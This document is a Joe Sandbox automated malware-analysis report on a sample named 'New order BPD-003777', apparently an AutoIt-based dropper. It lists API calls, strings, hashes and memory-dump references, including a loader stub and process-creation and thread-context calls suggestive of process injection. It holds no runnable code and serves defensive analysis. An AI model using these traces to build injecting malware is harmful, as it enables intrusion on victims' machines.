Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: >.$Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-525097599
Opcode ID: 6753ea545200ba6eee2e6144da984d424e741292116b4f9384e3fae670404487
Instruction ID: adff837d64a3cc93f82112fc05f2a087db316881ffbf7cb28a8f47b25a01988d
Opcode Fuzzy Hash: 6753ea545200ba6eee2e6144da984d424e741292116b4f9384e3fae670404487
Instruction Fuzzy Hash: 0F719B795293019EC716EF65DC819ABBBECBF8A740F40492EF445931B0EB309A58CF52

Function 00282B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00282B8E
LoadCursorW.USER32(00000000,00007F00), ref: 00282B9D
LoadIconW.USER32(00000063), ref: 00282BB3
LoadIconW.USER32(000000A4), ref: 00282BC5
LoadIconW.USER32(000000A2), ref: 00282BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00282BEF
RegisterClassExW.USER32(?), ref: 00282C40

Part of subcall function 00282CD4: GetSysColorBrush.USER32(0000000F), ref: 00282D07
Part of subcall function 00282CD4: RegisterClassExW.USER32(00000030), ref: 00282D31
Part of subcall function 00282CD4: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00282D42
Part of subcall function 00282CD4: LoadIconW.USER32(000000A9), ref: 00282D85

Strings

#, xrefs: 00282C16
AutoIt v3, xrefs: 00282C2F
0, xrefs: 00282C0F

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
String ID: #$0$AutoIt v3
API String ID: 2880975755-4155596026
Opcode ID: 06731aa7f542c59952751810c5c4c9c173afa842f903d0dba0f0edd5a18e4d7f
Instruction ID: 37335a48402ca755b2722f0e0732b3a795a1adfc98687ecec0f1fcb3fc8dc836
Opcode Fuzzy Hash: 06731aa7f542c59952751810c5c4c9c173afa842f903d0dba0f0edd5a18e4d7f
Instruction Fuzzy Hash: 1D215E78E50314AFDB129FA6EC65BAD7FB8FB08B51F00515AF500A66B0D3B10940CF90

Function 0028B710 Relevance: 16.3, APIs: 1, Strings: 8, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0028BB4E

Strings

p%5, xrefs: 0028BB32
p#5, xrefs: 0028BB6B
x#5, xrefs: 002D0207
x#5, xrefs: 002D0168
p#5, xrefs: 002D0263
p#5, xrefs: 0028BA72
p%5, xrefs: 0028B8DC
p#5, xrefs: 002D024F

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Init_thread_footer
String ID: p#5$p#5$p#5$p#5$p%5$p%5$x#5$x#5
API String ID: 1385522511-3150480149
Opcode ID: 680c36665b753e8581b775a0ca59ac33965fbb437756419604d28eccb81a0566
Instruction ID: 0807a049abb721051234ece40a880e6b40792093b8f8f9af74df6a8d92a7d4e4
Opcode Fuzzy Hash: 680c36665b753e8581b775a0ca59ac33965fbb437756419604d28eccb81a0566
Instruction Fuzzy Hash: DC32DD38A2120A9FDB16DF54C894BBEB7B9EF45304F14805AED05AB3A1C774ED61CB90

Function 0028DFD0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 002D32B7
D%5, xrefs: 002D2FDA
D%5, xrefs: 002D302D
D%5, xrefs: 0028E1E0
D%5D%5, xrefs: 0028E27E
D%5, xrefs: 0028E4B1

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID:
String ID: D%5$D%5$D%5$D%5$D%5D%5$Variable must be of type 'Object'.
API String ID: 0-3570658891
Opcode ID: 662799d7e7170e14a6194772281650ae6d44662c3ab7e35f6f1bbaaf318cf35c
Instruction ID: faaae4e32aa59fe6cf533f66658268a31426fc1f8a9440984af3345ed6aa51e9
Opcode Fuzzy Hash: 662799d7e7170e14a6194772281650ae6d44662c3ab7e35f6f1bbaaf318cf35c
Instruction Fuzzy Hash: C4C2BF79A21205CFDF14EF58C880AADB7B1BF09300F25856AE905AB3A1D375ED61CF91

Function 00282CD4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 53
registrywindowclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00282D07
RegisterClassExW.USER32(00000030), ref: 00282D31
RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00282D42
LoadIconW.USER32(000000A9), ref: 00282D85

Strings

AutoIt v3 GUI, xrefs: 00282D23
+, xrefs: 00282CF0
TaskbarCreated, xrefs: 00282D37
0, xrefs: 00282CE9

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Register$BrushClassClipboardColorFormatIconLoad
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 975902462-1005189915
Opcode ID: 629c0db19c4fd719bf041fae5683b378fc2bf54db44f51b2144b889e957adab6
Instruction ID: f56fcb2d6e78d9cbef4f1b2a938c0cb7d310ce45739db63029399728977e5757
Opcode Fuzzy Hash: 629c0db19c4fd719bf041fae5683b378fc2bf54db44f51b2144b889e957adab6
Instruction Fuzzy Hash: 4D21C0B5961318AFDB02DFA4EC89BDDBBB8FB0C701F00911AF511A62A0D7B14544CF91

Function 0146D758 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0146D829
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0146DA4F

Memory Dump Source

Source File: 00000000.00000002.1778371104.000000000146B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0146B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_146b000_New order BPD-003777.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
Instruction ID: 051a45217308e2aeecc7930a9d80928225d9d4aa6903ff673ab0714739dfb06d
Opcode Fuzzy Hash: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
Instruction Fuzzy Hash: AFA11970E04209EBDB14CFE4C898BEEBBB9BF48308F10855AE255BB290D7759A45CF51

Function 00282C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 00282C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00282CB2
ShowWindow.USER32(00000000,?,?,00282B2F), ref: 00282CC6
ShowWindow.USER32(00000000,?,?,00282B2F), ref: 00282CCF

Strings

edit, xrefs: 00282CAC
AutoIt v3, xrefs: 00282C89, 00282C8E, 00282C8F

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 7f6b080d7e7d2c658996373bc2b273701d5fc609d43d41295d6675ad34274a6d
Instruction ID: 4fd0fdcfb36709a1051da5b3e2cbf2f8512d795eb1e70281117f708f77b5317c
Opcode Fuzzy Hash: 7f6b080d7e7d2c658996373bc2b273701d5fc609d43d41295d6675ad34274a6d
Instruction Fuzzy Hash: 7BF0D4796913907AEB331B27AC18FB72EBDD7CAF61F01505AF900A65B0C6A11850DAB4

Function 0146D4E8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 158
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0146D3D8: Sleep.KERNELBASE(000001F4), ref: 0146D3E9

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0146D645

Strings

U4OK3GCBTAUBB62FEUXTCW, xrefs: 0146D6A8, 0146D6AB

Memory Dump Source

Source File: 00000000.00000002.1778371104.000000000146B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0146B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_146b000_New order BPD-003777.jbxd

Similarity

API ID: CreateFileSleep
String ID: U4OK3GCBTAUBB62FEUXTCW
API String ID: 2694422964-3591260867
Opcode ID: a9282d23afa13a71321bbb2fd93ef96dcd7a9634169177ba37df0b6a6e1246c4
Instruction ID: 743aff17950d4bd7ae5bdd40aa1d6911f92939ac04355a17e90ceaef9895291e
Opcode Fuzzy Hash: a9282d23afa13a71321bbb2fd93ef96dcd7a9634169177ba37df0b6a6e1246c4
Instruction Fuzzy Hash: D3619730E04248DBEF11DBE4C854BEEBB79AF15304F044199E249BB2D1D7BA1B45CBA6

Function 002810F3 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 153
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00281BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00281BF4
Part of subcall function 00281BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00281BFC
Part of subcall function 00281BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00281C07
Part of subcall function 00281BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00281C12
Part of subcall function 00281BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00281C1A
Part of subcall function 00281BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00281C22

Part of subcall function 00281B4A: RegisterClipboardFormatW.USER32(00000004), ref: 00281BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0028136A
OleInitialize.OLE32 ref: 00281388
CloseHandle.KERNEL32(00000000,00000000), ref: 002C24AB

Strings

dM., xrefs: 00281105
>., xrefs: 002811C8, 0028129C

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
String ID: >.$dM.
API String ID: 3094916012-3957290568
Opcode ID: d6e4a259d775f2f18d9433a53a82db7314e0b576eb756ab92457ad140bde7527
Instruction ID: f38e0caae83b3b1547f631649eb0aafa7f291affab1231862ec63d88d91fda71
Opcode Fuzzy Hash: d6e4a259d775f2f18d9433a53a82db7314e0b576eb756ab92457ad140bde7527
Instruction Fuzzy Hash: A271C2B89213408FC797EF7AA9457953BECBB8A346B549A2AD40AC73B1FB304455CF40

Function 004277B0 Relevance: 7.7, APIs: 5, Instructions: 206
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?), ref: 004278EA
GetProcAddress.KERNEL32(?,00420FF9), ref: 00427908
ExitProcess.KERNEL32(?,00420FF9), ref: 00427919
VirtualProtect.KERNELBASE(00280000,00001000,00000004,?,00000000), ref: 00427967
VirtualProtect.KERNELBASE(00280000,00001000), ref: 0042797C

Memory Dump Source

Source File: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
String ID:
API String ID: 1996367037-0
Opcode ID: 8107a3fa5b06de7d75dd4bfe039ee33397b0b39f2bf1781f0ef9bb48b01c4c7b
Instruction ID: 51673891e44c9ae39be96f7e58eb670881e4b912e8df2125da2ecdb2edfa65ce
Opcode Fuzzy Hash: 8107a3fa5b06de7d75dd4bfe039ee33397b0b39f2bf1781f0ef9bb48b01c4c7b
Instruction Fuzzy Hash: 42513CB2B4C3724BD7216E78ECC4661B794EB423207A8077EC5E2C73C5E7A85846C769

Function 00283B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00283B0F,SwapMouseButtons,00000004,?), ref: 00283B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00283B0F,SwapMouseButtons,00000004,?,?,?,?,00284D9C), ref: 00283B61
RegCloseKey.KERNELBASE(00000000,?,?,00283B0F,SwapMouseButtons,00000004,?,?,?,?,00284D9C), ref: 00283B83

Strings

Control Panel\Mouse, xrefs: 00283B3E

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 88cc99f3f6724ccace105dee97bb47aa17cded22f5a13f4e964f3ef872151512
Instruction ID: 1dfa25dc2907cabe1609de14b5cb25eb0963502832e24b970fc21278f55e2578
Opcode Fuzzy Hash: 88cc99f3f6724ccace105dee97bb47aa17cded22f5a13f4e964f3ef872151512
Instruction Fuzzy Hash: F9112AB9521209FFDB21DFA5DC44AEEB7BCEF08B89B108459A805D7150E271DF509760

Function 0146C3D8 Relevance: 6.7, APIs: 4, Instructions: 720
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 0146CB93
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0146CC29
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0146CC4B

Memory Dump Source

Source File: 00000000.00000002.1778371104.000000000146B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0146B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_146b000_New order BPD-003777.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 9047a88c2d072b7342029fe0aa6aa2f7d3ded7dcef0efedc075a7d8f177d985c
Instruction ID: 2ee21218c01af929413087bd9c12eaa589ba5d66ac3c59c1349a165a4a63e7c2
Opcode Fuzzy Hash: 9047a88c2d072b7342029fe0aa6aa2f7d3ded7dcef0efedc075a7d8f177d985c
Instruction Fuzzy Hash: 52621E30A14218DBEB24CFA4C850BDEB775EF58304F1091A9D14DEB3A0E7759E81CB5A

Function 00283923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 002C33A2

Part of subcall function 00286B57: _wcslen.LIBCMT ref: 00286B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00283A04

Strings

Line: , xrefs: 002C33EB

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: cb76eede8659a60cb48cb65f11cf338607462b9a7202ae977ad056a5cb485d5f
Instruction ID: 75fdf6ffac3a7cbd77384d56f80e733e9a19dae1994a6b67699122b4c4367e5b
Opcode Fuzzy Hash: cb76eede8659a60cb48cb65f11cf338607462b9a7202ae977ad056a5cb485d5f
Instruction Fuzzy Hash: 2E31E47542A301AAD322FB10DC45FEBB7DCAB40B11F00495AF599930E1EF709669CBC2

Function 0029FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 002A0668

Part of subcall function 002A32A4: RaiseException.KERNEL32(?,?,?,002A068A,?,003513F0,?,?,?,?,?,?,002A068A,?,00348738), ref: 002A3304

__CxxThrowException@8.LIBVCRUNTIME ref: 002A0685

Strings

Unknown exception, xrefs: 002A0692

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: db10a5ce0129783f68bb1bb37adabc43bf4aeb8437c012b66f28025876ad568e
Instruction ID: 9225419dbd0c3e1cda1ac375199ad4399304a2437e1ebe7efd176ee929f58534
Opcode Fuzzy Hash: db10a5ce0129783f68bb1bb37adabc43bf4aeb8437c012b66f28025876ad568e
Instruction Fuzzy Hash: FBF02234C2020EB7CF04FAA4D886C9E7B6C6E02344B604031F914C6492EF70EA35C9D0

Function 00283837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00283908

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: e403406d52e6164c4e090206832b2993a42b77e54152c6a78fca5b81b22bb9fd
Instruction ID: 955e4e00d577b233cefd42dc1555ef01f40fea66de1b75e9881c4b9012e10d66
Opcode Fuzzy Hash: e403406d52e6164c4e090206832b2993a42b77e54152c6a78fca5b81b22bb9fd
Instruction Fuzzy Hash: 0431B474615301DFD721EF24D894797BBE8FB49709F00092EF99983290E7B1AA54CB92

Function 00285745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0028949C,?,00008000), ref: 00285773
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0028949C,?,00008000), ref: 002C4052

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7d30f410942f7d9b0cd5f6c08c91ec9bd7c3cbe094e4834be153ca7f8a04a655
Instruction ID: f38edd19752111e6520fa715b79cb72fa46f3bf7eb555260ec97320f4e581d29
Opcode Fuzzy Hash: 7d30f410942f7d9b0cd5f6c08c91ec9bd7c3cbe094e4834be153ca7f8a04a655
Instruction Fuzzy Hash: 4F019230195225B6E3311A2ACC0EFA7BF98EF067B0F10C314BA9C5A1E0C7B45864CB90

Function 0146C3D5 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 0146CB93
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0146CC29
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0146CC4B

Memory Dump Source

Source File: 00000000.00000002.1778371104.000000000146B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0146B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_146b000_New order BPD-003777.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
